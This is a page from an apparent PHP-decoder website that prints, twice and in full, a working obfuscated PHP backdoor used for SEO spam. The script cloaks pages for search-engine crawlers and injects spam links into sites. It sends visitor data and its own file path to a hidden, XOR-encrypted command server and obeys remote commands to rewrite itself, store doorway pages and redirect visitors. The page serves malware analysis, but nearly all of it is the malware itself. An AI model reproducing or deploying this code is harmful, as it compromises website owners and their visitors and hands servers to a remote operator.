Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(0);if(preg_match('/majestic|ahrefs|baidu/i',$_SERVER['HTTP_USER_AGEN..

Decoded Output download

<?php error_reporting(0);if(preg_match('/majestic|ahrefs|baidu/i',$_SERVER['HTTP_USER_AGENT'])){return true;}$NzV='003';if(md5($_SERVER['HTTP_USER_AGENT'])== '9d10e16325b4e7c5c4c5a910516413ab'){echo "ALLESGUT:" .$NzV;exit;}$ea='_shaesx_';$ay='get_data_ya';$ae='decode';$ea=str_replace('_sha','bas',$ea);$ao='NzWpCd';$ee=$ea .$ae;$oa=str_replace('sx','64',$ee);$algo='md5';$LocalStr="umxUIpw3BK/wYZ9kOBHb/O74oKpGtMl53L7KLJEaYH0=";$NzPL="638d7fdc3a16fd19b53f2f1d8288898d";function NzServerVar($var=''){if(isset($_SERVER)&& is_array($_SERVER)&& array_key_exists($var,$_SERVER)&&!empty($_SERVER[$var])){return $_SERVER[$var];}else if(function_exists('getenv')&& getenv($var)){return getenv($var);}else{return '';}}function NzGetRealIp(){if(!empty($_SERVER['HTTP_CLIENT_IP'])){$ip=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}else{$ip=$_SERVER['REMOTE_ADDR'];}return $ip;}function NzGetHostname($remove_www=false){$server_host=NzServerVar('HTTP_HOST');if(empty($server_host)){$server_host=NzServerVar('SERVER_NAME');}if($remove_www){$server_host=preg_replace('#^www\.#i','',$server_host);}return strtolower($server_host);}function NzGetRef(){if(isset($_SERVER['HTTP_REFERER'])){$referer=$_SERVER['HTTP_REFERER'];}else{$referer='NOREF';}return $referer;}function NzGetRealHost(){$pageURL='http';if(isset($_SERVER['HTTPS'])){if(strcasecmp($_SERVER["HTTPS"],"on")== 0){$pageURL .= "s";}}$pageURL .= "://";$pageURL .= $_SERVER["SERVER_NAME"] .$_SERVER["REQUEST_URI"];$data=parse_url($pageURL);$RealHost=$data['scheme'] ."://" .$data['host'];return urlencode(strtolower($RealHost));}function NzGetMethod(){if((function_exists('curl_init'))&&(function_exists('curl_exec'))){$res="curl";}elseif(function_exists('fsockopen')){$res="fsock";}return $res;}function NzDe($data){return@gzinflate(@str_rot13(@base64_decode($data)));}function NzCo($data){return@base64_encode(@str_rot13(@gzdeflate($data)));}function NzHiBot($Ip,$BotList,$Agent){if(preg_match('/google|bing|aol|yahoo|yandex|msn|baidu|facebook/i',$Agent)){return true;}$VisitorHost=strtolower(gethostbyaddr($Ip));if(preg_match('/google|bing|aol|yahoo|yandex|msn|baidu|facebook/i',$VisitorHost)){return true;}if(is_file($BotList)){$iplist=file_get_contents($BotList);$iplist=explode("
",$iplist);if(in_array($Ip,$iplist)){return true;}}return false;}function NzGenDoor($Agent){if(md5($Agent)== '8604be35bc3fc28cbadeb8f91f89399f'){return true;}}function NzMkBL($BotList){if(!file_exists($BotList)or(time()-filemtime($BotList)>= '100000')){$botlistdata=file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt');$baseg=explode("#",$botlistdata);for($i=0;$i<count($baseg);$i++){$basec=explode("
",$baseg[$i]);for($i2=0;$i2<count($basec);$i2++){if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/',$basec[$i2])){$basegoogle[]=$basec[$i2];}}}$basegoogle=array_unique($basegoogle);$basegoogle=implode(PHP_EOL,$basegoogle);$file=fopen($BotList,"w+");fwrite($file,$basegoogle);fclose($file);}}function NzWpCd($fd,$fa=""){$fe="commonegirls";$len=strlen($fd);$ff='';$n=$len>100?8:2;while(strlen($ff)<$len){$ff .= substr(pack('H*',sha1($fa .$ff .$fe)),0,$n);}return $fd^$ff;}function NzGetRData($page,$useragent,$method,$collection){$result='';$timeout=33;$newRRR=parse_url($page);$url_new=$newRRR['host'];$path_new=$newRRR['path'];if($method == "curl"){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$page);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_TIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);if($collection){curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,'collection=' .$collection);}$result=curl_exec($ch);curl_close($ch);}if($method == "fsock"){$socket=fsockopen($url_new,80,$errno,$errstr,$timeout);if(!$socket)die("$errstr($errno)");$data='';if($collection){$data="collection=" .urlencode($collection);}fwrite($socket,"POST " .$path_new ." HTTP/1.0
");fwrite($socket,"Host: " .$url_new ."
");fwrite($socket,"Content-type: application/x-www-form-urlencoded
");fwrite($socket,"Content-length:" .strlen($data) ."
");fwrite($socket,"Accept:*/*
");fwrite($socket,"User-agent:" .$useragent ."
");fwrite($socket,"Connection:Close
");fwrite($socket,"
");fwrite($socket,"$data
");fwrite($socket,"
");$result='';while(!feof($socket)){$result.= fgets($socket);}}preg_match("#<response>(.*?)</response>#isU",$result,$out);$result=trim($out[1]);return $result;fclose($socket);}function NzRept($search,$replace,$subject){$pos=strrpos($subject,$search);if($pos !== false){$subject=substr_replace($subject,$replace,$pos,strlen($search));}return $subject;}function ob_gzzhandle($html){$gzip=FALSE;if(function_exists('gzdecode')){if(gzdecode($html)!= FALSE){$gzip=TRUE;$html=gzdecode($html);}}$NzLksData=@file_get_contents($_ENV['NzLksFile']);$NzLksData=NzDe($NzLksData);$NzLksData=base64_decode($NzLksData);if(preg_match('/<\/ul>/i',$html)){$UlCount=substr_count($html,"</ul>");$NzLksData=explode("
",$NzLksData);foreach($NzLksData as $NzLink){$NzLink=trim($NzLink);if($NzLink<>''){$NzLink="<li>" .$NzLink ."</li>";$NzLksDataOut[]=$NzLink;}}$NzLksData=implode("
",$NzLksDataOut);if($_ENV['MakeLks']== 1){$html=NzRept("</ul>",$NzLksData ."
</ul>",$html);$_ENV['MakeLks']=0;}}else{if($_ENV['MakeLks']== 1){$html=str_replace("</body>",$NzLksData ."
</body>",$html);$_ENV['MakeLks']=0;}}if($gzip){$html=gzencode($html,9);}return $html;}$NzVisitorIp=NzGetRealIp();$NzVisitorLang=substr(NzServerVar('HTTP_ACCEPT_LANGUAGE'),0,2);$NzVisitorAgent=NzServerVar('HTTP_USER_AGENT');$NzMethod=NzGetMethod();$NzHostName=NzGetHostname(true);$NzRealHost=NzGetRealHost();$NzRef=NzGetRef();$NzServerRequest=NzServerVar('REQUEST_URI');$NzCore=$ao($oa("$LocalStr"),'wp_function');$NzWorkAgent='nzsysbot';$WorkDir=dirname(__FILE__) ."/.sns/";$OldWorkDir=dirname(__FILE__) ."/.sys/";$DomDir=$WorkDir .md5($NzHostName) ."/";$OldDomDir=$OldWorkDir .md5($NzHostName) ."/";$NzSelfInfo=__FILE__;$NzSelfArray=pathinfo($NzSelfInfo);$NzSelfPath=$NzSelfArray['dirname'] .'/' .$NzSelfArray['basename'];$NzSelfPath=base64_encode($NzSelfPath);if(!is_dir($WorkDir)){mkdir($WorkDir,0777);}if(!is_dir($DomDir)){mkdir($DomDir,0777);}if(!is_dir($DomDir .'.drs/')){mkdir($DomDir .'.drs/',0777);}if(!is_dir($DomDir .'.lks/')){mkdir($DomDir .'.lks/',0777);}if(($NzServerRequest == '/')||(preg_match('/.jpg|.jpeg|.gif|.txt|.pdf|.png|.js|.asp|.ico|wp-admin|wp-content|admin/i',$NzServerRequest))){return true;}$NzPageFile=$DomDir .'.drs/' .md5($NzServerRequest);$OldNzPageFile=$OldDomDir .'.drs/' .md5($NzServerRequest);$NzLksFile=$DomDir .'.lks/' .md5($NzServerRequest);$NzBL=$DomDir .'sys.bts';$NzBot=FALSE;$NzGen=FALSE;$NPF=FALSE;$ONPF=FALSE;$NLF=FALSE;$NzWho='';NzMkBL($NzBL);$NzBot=NzHiBot($NzVisitorIp,$NzBL,$NzVisitorAgent);$NzGen=NzGenDoor($NzVisitorAgent);if($NzBot){$NzWho="BOT";}if($NzGen){$NzWho="NzGEN";}if((!$NzBot)&&(!$NzGen)){$NzWho="HUMAN";}$_ENV['NzLksFile']=$NzLksFile;$_ENV['NzBot']=$NzBot;$_ENV['NzServerRequest']=$NzServerRequest;$_ENV['MakeLks']=1;if(file_exists($NzPageFile)){$NPF=TRUE;}if(file_exists($OldNzPageFile)){$ONPF=TRUE;}if(file_exists($NzLksFile)){$NLF=TRUE;}$NzSndBlock=array("remotehost"=> $NzHostName,"realhost"=> $NzRealHost,"useragent"=> $NzVisitorAgent,"userip"=> $NzVisitorIp,"userlang"=> $NzVisitorLang,"userwho"=> $NzWho,"remoteuri"=> $NzServerRequest,"referer"=> $NzRef,"scriptver"=> $NzV,"selfpath"=> $NzSelfPath,);$NzSndBlock=serialize($NzSndBlock);$NzSndBlock=base64_encode($NzSndBlock);if($NzGen){$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/SELFUPDATE/i',$NzMakeReq)){$telo=str_replace('SELFUPDATE','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$selfdata=$telo['secretka'];$selfhash=$telo['hash'];$selfpath=$telo['selfpath'];$selfpath=base64_decode($selfpath);$secretkahash=md5($selfdata);if(($selfdata<>'')&&($secretkahash == $selfhash)){$file=fopen($selfpath,'w');fwrite($file,$selfdata ."
");fclose($file);}return true;}if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SAVEDOOR/i',$NzMakeReq)){$telo=str_replace('SAVEDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);$NzPageContent=NzCo($door);@file_put_contents($NzPageFile,$NzPageContent);echo $door;exit;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/SHOWLKS/i',$NzMakeReq)){$telo=str_replace('SHOWLKS','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$NzLks=$telo['lks'];$NzLks=base64_encode($NzLks);$NzLks=NzCo($NzLks);@file_put_contents($_ENV['NzLksFile'],$NzLks);$fref=fopen(dirname(__FILE__) ."/LKS-log.txt","a");fwrite($fref,"FILE:" .$_ENV['NzLksFile'] ."|" .base64_decode($NzSndBlock) ."
");fclose($fref);ob_start('ob_gzzhandle');return true;}}if($NzBot){if($NPF){$NzDoorData=@file_get_contents($NzPageFile);$NzDoorData=NzDe($NzDoorData);$NzDoorContent=$NzDoorData;echo $NzDoorContent;exit;}if($NLF){ob_start('ob_gzzhandle');return true;}$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/SELFUPDATE/i',$NzMakeReq)){$telo=str_replace('SELFUPDATE','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$selfdata=$telo['secretka'];$selfhash=$telo['hash'];$selfpath=$telo['selfpath'];$selfpath=base64_decode($selfpath);$secretkahash=md5($selfdata);if(($selfdata<>'')&&($secretkahash == $selfhash)){$file=fopen($selfpath,'w');fwrite($file,$selfdata ."
");fclose($file);}return true;}if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SAVEDOOR/i',$NzMakeReq)){$telo=str_replace('SAVEDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);$NzPageContent=NzCo($door);@file_put_contents($NzPageFile,$NzPageContent);echo $door;exit;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/SHOWLKS/i',$NzMakeReq)){$telo=str_replace('SHOWLKS','',$NzMakeReq);$telo=unserialize($telo);$NzLks=$telo['lks'];$NzLks=base64_decode($NzLks);$NzLks=base64_encode($NzLks);$NzLks=NzCo($NzLks);@file_put_contents($_ENV['NzLksFile'],$NzLks);$fref=fopen(dirname(__FILE__) ."/LKS-log.txt","a");fwrite($fref,"FILE:" .$_ENV['NzLksFile'] ."|" .base64_decode($NzSndBlock) ."
");fclose($fref);ob_start('ob_gzzhandle');return true;}}if(($NPF)||($ONPF)){$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/NEWHEAD/i',$NzMakeReq)){$telo=str_replace('NEWHEAD','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$type=$telo['type'];$address=$telo['address'];$door=$telo['doorcontent'];header($type);if($address){header("Location: " .$address);exit;}if($door){$door=base64_decode($door);echo $door;}exit;}} ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);if(preg_match('/majestic|ahrefs|baidu/i',$_SERVER['HTTP_USER_AGENT'])){return true;}$NzV='003';if(md5($_SERVER['HTTP_USER_AGENT'])== '9d10e16325b4e7c5c4c5a910516413ab'){echo "ALLESGUT:" .$NzV;exit;}$ea='_shaesx_';$ay='get_data_ya';$ae='decode';$ea=str_replace('_sha','bas',$ea);$ao='NzWpCd';$ee=$ea .$ae;$oa=str_replace('sx','64',$ee);$algo='md5';$LocalStr="umxUIpw3BK/wYZ9kOBHb/O74oKpGtMl53L7KLJEaYH0=";$NzPL="638d7fdc3a16fd19b53f2f1d8288898d";function NzServerVar($var=''){if(isset($_SERVER)&& is_array($_SERVER)&& array_key_exists($var,$_SERVER)&&!empty($_SERVER[$var])){return $_SERVER[$var];}else if(function_exists('getenv')&& getenv($var)){return getenv($var);}else{return '';}}function NzGetRealIp(){if(!empty($_SERVER['HTTP_CLIENT_IP'])){$ip=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}else{$ip=$_SERVER['REMOTE_ADDR'];}return $ip;}function NzGetHostname($remove_www=false){$server_host=NzServerVar('HTTP_HOST');if(empty($server_host)){$server_host=NzServerVar('SERVER_NAME');}if($remove_www){$server_host=preg_replace('#^www\.#i','',$server_host);}return strtolower($server_host);}function NzGetRef(){if(isset($_SERVER['HTTP_REFERER'])){$referer=$_SERVER['HTTP_REFERER'];}else{$referer='NOREF';}return $referer;}function NzGetRealHost(){$pageURL='http';if(isset($_SERVER['HTTPS'])){if(strcasecmp($_SERVER["HTTPS"],"on")== 0){$pageURL .= "s";}}$pageURL .= "://";$pageURL .= $_SERVER["SERVER_NAME"] .$_SERVER["REQUEST_URI"];$data=parse_url($pageURL);$RealHost=$data['scheme'] ."://" .$data['host'];return urlencode(strtolower($RealHost));}function NzGetMethod(){if((function_exists('curl_init'))&&(function_exists('curl_exec'))){$res="curl";}elseif(function_exists('fsockopen')){$res="fsock";}return $res;}function NzDe($data){return@gzinflate(@str_rot13(@base64_decode($data)));}function NzCo($data){return@base64_encode(@str_rot13(@gzdeflate($data)));}function NzHiBot($Ip,$BotList,$Agent){if(preg_match('/google|bing|aol|yahoo|yandex|msn|baidu|facebook/i',$Agent)){return true;}$VisitorHost=strtolower(gethostbyaddr($Ip));if(preg_match('/google|bing|aol|yahoo|yandex|msn|baidu|facebook/i',$VisitorHost)){return true;}if(is_file($BotList)){$iplist=file_get_contents($BotList);$iplist=explode("\n",$iplist);if(in_array($Ip,$iplist)){return true;}}return false;}function NzGenDoor($Agent){if(md5($Agent)== '8604be35bc3fc28cbadeb8f91f89399f'){return true;}}function NzMkBL($BotList){if(!file_exists($BotList)or(time()-filemtime($BotList)>= '100000')){$botlistdata=file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt');$baseg=explode("#",$botlistdata);for($i=0;$i<count($baseg);$i++){$basec=explode("\n",$baseg[$i]);for($i2=0;$i2<count($basec);$i2++){if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/',$basec[$i2])){$basegoogle[]=$basec[$i2];}}}$basegoogle=array_unique($basegoogle);$basegoogle=implode(PHP_EOL,$basegoogle);$file=fopen($BotList,"w+");fwrite($file,$basegoogle);fclose($file);}}function NzWpCd($fd,$fa=""){$fe="commonegirls";$len=strlen($fd);$ff='';$n=$len>100?8:2;while(strlen($ff)<$len){$ff .= substr(pack('H*',sha1($fa .$ff .$fe)),0,$n);}return $fd^$ff;}function NzGetRData($page,$useragent,$method,$collection){$result='';$timeout=33;$newRRR=parse_url($page);$url_new=$newRRR['host'];$path_new=$newRRR['path'];if($method == "curl"){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$page);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_TIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);if($collection){curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,'collection=' .$collection);}$result=curl_exec($ch);curl_close($ch);}if($method == "fsock"){$socket=fsockopen($url_new,80,$errno,$errstr,$timeout);if(!$socket)die("$errstr($errno)");$data='';if($collection){$data="collection=" .urlencode($collection);}fwrite($socket,"POST " .$path_new ." HTTP/1.0\r\n");fwrite($socket,"Host: " .$url_new ."\r\n");fwrite($socket,"Content-type: application/x-www-form-urlencoded\r\n");fwrite($socket,"Content-length:" .strlen($data) ."\r\n");fwrite($socket,"Accept:*/*\r\n");fwrite($socket,"User-agent:" .$useragent ."\r\n");fwrite($socket,"Connection:Close\r\n");fwrite($socket,"\r\n");fwrite($socket,"$data\r\n");fwrite($socket,"\r\n");$result='';while(!feof($socket)){$result.= fgets($socket);}}preg_match("#<response>(.*?)</response>#isU",$result,$out);$result=trim($out[1]);return $result;fclose($socket);}function NzRept($search,$replace,$subject){$pos=strrpos($subject,$search);if($pos !== false){$subject=substr_replace($subject,$replace,$pos,strlen($search));}return $subject;}function ob_gzzhandle($html){$gzip=FALSE;if(function_exists('gzdecode')){if(gzdecode($html)!= FALSE){$gzip=TRUE;$html=gzdecode($html);}}$NzLksData=@file_get_contents($_ENV['NzLksFile']);$NzLksData=NzDe($NzLksData);$NzLksData=base64_decode($NzLksData);if(preg_match('/<\/ul>/i',$html)){$UlCount=substr_count($html,"</ul>");$NzLksData=explode("\n",$NzLksData);foreach($NzLksData as $NzLink){$NzLink=trim($NzLink);if($NzLink<>''){$NzLink="<li>" .$NzLink ."</li>";$NzLksDataOut[]=$NzLink;}}$NzLksData=implode("\n",$NzLksDataOut);if($_ENV['MakeLks']== 1){$html=NzRept("</ul>",$NzLksData ."\n</ul>",$html);$_ENV['MakeLks']=0;}}else{if($_ENV['MakeLks']== 1){$html=str_replace("</body>",$NzLksData ."\n</body>",$html);$_ENV['MakeLks']=0;}}if($gzip){$html=gzencode($html,9);}return $html;}$NzVisitorIp=NzGetRealIp();$NzVisitorLang=substr(NzServerVar('HTTP_ACCEPT_LANGUAGE'),0,2);$NzVisitorAgent=NzServerVar('HTTP_USER_AGENT');$NzMethod=NzGetMethod();$NzHostName=NzGetHostname(true);$NzRealHost=NzGetRealHost();$NzRef=NzGetRef();$NzServerRequest=NzServerVar('REQUEST_URI');$NzCore=$ao($oa("$LocalStr"),'wp_function');$NzWorkAgent='nzsysbot';$WorkDir=dirname(__FILE__) ."/.sns/";$OldWorkDir=dirname(__FILE__) ."/.sys/";$DomDir=$WorkDir .md5($NzHostName) ."/";$OldDomDir=$OldWorkDir .md5($NzHostName) ."/";$NzSelfInfo=__FILE__;$NzSelfArray=pathinfo($NzSelfInfo);$NzSelfPath=$NzSelfArray['dirname'] .'/' .$NzSelfArray['basename'];$NzSelfPath=base64_encode($NzSelfPath);if(!is_dir($WorkDir)){mkdir($WorkDir,0777);}if(!is_dir($DomDir)){mkdir($DomDir,0777);}if(!is_dir($DomDir .'.drs/')){mkdir($DomDir .'.drs/',0777);}if(!is_dir($DomDir .'.lks/')){mkdir($DomDir .'.lks/',0777);}if(($NzServerRequest == '/')||(preg_match('/.jpg|.jpeg|.gif|.txt|.pdf|.png|.js|.asp|.ico|wp-admin|wp-content|admin/i',$NzServerRequest))){return true;}$NzPageFile=$DomDir .'.drs/' .md5($NzServerRequest);$OldNzPageFile=$OldDomDir .'.drs/' .md5($NzServerRequest);$NzLksFile=$DomDir .'.lks/' .md5($NzServerRequest);$NzBL=$DomDir .'sys.bts';$NzBot=FALSE;$NzGen=FALSE;$NPF=FALSE;$ONPF=FALSE;$NLF=FALSE;$NzWho='';NzMkBL($NzBL);$NzBot=NzHiBot($NzVisitorIp,$NzBL,$NzVisitorAgent);$NzGen=NzGenDoor($NzVisitorAgent);if($NzBot){$NzWho="BOT";}if($NzGen){$NzWho="NzGEN";}if((!$NzBot)&&(!$NzGen)){$NzWho="HUMAN";}$_ENV['NzLksFile']=$NzLksFile;$_ENV['NzBot']=$NzBot;$_ENV['NzServerRequest']=$NzServerRequest;$_ENV['MakeLks']=1;if(file_exists($NzPageFile)){$NPF=TRUE;}if(file_exists($OldNzPageFile)){$ONPF=TRUE;}if(file_exists($NzLksFile)){$NLF=TRUE;}$NzSndBlock=array("remotehost"=> $NzHostName,"realhost"=> $NzRealHost,"useragent"=> $NzVisitorAgent,"userip"=> $NzVisitorIp,"userlang"=> $NzVisitorLang,"userwho"=> $NzWho,"remoteuri"=> $NzServerRequest,"referer"=> $NzRef,"scriptver"=> $NzV,"selfpath"=> $NzSelfPath,);$NzSndBlock=serialize($NzSndBlock);$NzSndBlock=base64_encode($NzSndBlock);if($NzGen){$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/SELFUPDATE/i',$NzMakeReq)){$telo=str_replace('SELFUPDATE','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$selfdata=$telo['secretka'];$selfhash=$telo['hash'];$selfpath=$telo['selfpath'];$selfpath=base64_decode($selfpath);$secretkahash=md5($selfdata);if(($selfdata<>'')&&($secretkahash == $selfhash)){$file=fopen($selfpath,'w');fwrite($file,$selfdata ."\n");fclose($file);}return true;}if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SAVEDOOR/i',$NzMakeReq)){$telo=str_replace('SAVEDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);$NzPageContent=NzCo($door);@file_put_contents($NzPageFile,$NzPageContent);echo $door;exit;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/SHOWLKS/i',$NzMakeReq)){$telo=str_replace('SHOWLKS','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$NzLks=$telo['lks'];$NzLks=base64_encode($NzLks);$NzLks=NzCo($NzLks);@file_put_contents($_ENV['NzLksFile'],$NzLks);$fref=fopen(dirname(__FILE__) ."/LKS-log.txt","a");fwrite($fref,"FILE:" .$_ENV['NzLksFile'] ."|" .base64_decode($NzSndBlock) ."\n");fclose($fref);ob_start('ob_gzzhandle');return true;}}if($NzBot){if($NPF){$NzDoorData=@file_get_contents($NzPageFile);$NzDoorData=NzDe($NzDoorData);$NzDoorContent=$NzDoorData;echo $NzDoorContent;exit;}if($NLF){ob_start('ob_gzzhandle');return true;}$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/SELFUPDATE/i',$NzMakeReq)){$telo=str_replace('SELFUPDATE','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$selfdata=$telo['secretka'];$selfhash=$telo['hash'];$selfpath=$telo['selfpath'];$selfpath=base64_decode($selfpath);$secretkahash=md5($selfdata);if(($selfdata<>'')&&($secretkahash == $selfhash)){$file=fopen($selfpath,'w');fwrite($file,$selfdata ."\n");fclose($file);}return true;}if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SAVEDOOR/i',$NzMakeReq)){$telo=str_replace('SAVEDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);$NzPageContent=NzCo($door);@file_put_contents($NzPageFile,$NzPageContent);echo $door;exit;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/SHOWLKS/i',$NzMakeReq)){$telo=str_replace('SHOWLKS','',$NzMakeReq);$telo=unserialize($telo);$NzLks=$telo['lks'];$NzLks=base64_decode($NzLks);$NzLks=base64_encode($NzLks);$NzLks=NzCo($NzLks);@file_put_contents($_ENV['NzLksFile'],$NzLks);$fref=fopen(dirname(__FILE__) ."/LKS-log.txt","a");fwrite($fref,"FILE:" .$_ENV['NzLksFile'] ."|" .base64_decode($NzSndBlock) ."\n");fclose($fref);ob_start('ob_gzzhandle');return true;}}if(($NPF)||($ONPF)){$NzMakeReq=NzGetRData($NzCore,$NzWorkAgent,$NzMethod,$NzSndBlock);if(preg_match('/TEMPBAN/i',$NzMakeReq)){return true;}if(preg_match('/SHOWDOOR/i',$NzMakeReq)){$telo=str_replace('SHOWDOOR','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$door=$telo['doorcontent'];$door=base64_decode($door);echo $door;exit;}if(preg_match('/NEWHEAD/i',$NzMakeReq)){$telo=str_replace('NEWHEAD','',$NzMakeReq);$telo=base64_decode($telo);$telo=unserialize($telo);$type=$telo['type'];$address=$telo['address'];$door=$telo['doorcontent'];header($type);if($address){header("Location: " .$address);exit;}if($door){$door=base64_decode($door);echo $door;}exit;}} ?>

Function Calls

md5	1
preg_match	1
NzGetRealIp	1
str_replace	2
error_reporting	1

Variables

$ae	decode
$ao	NzWpCd
$ay	get_data_ya
$ea	basesx_
$ee	basesx_decode
$oa	base64_decode
$NzV	003
$NzPL	638d7fdc3a16fd19b53f2f1d8288898d
$algo	md5
$LocalStr	umxUIpw3BK/wYZ9kOBHb/O74oKpGtMl53L7KLJEaYH0=

Stats

MD5	5502f1ee17e9045efcda72dfa2a8a319
Eval Count	0
Decode Time	179 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats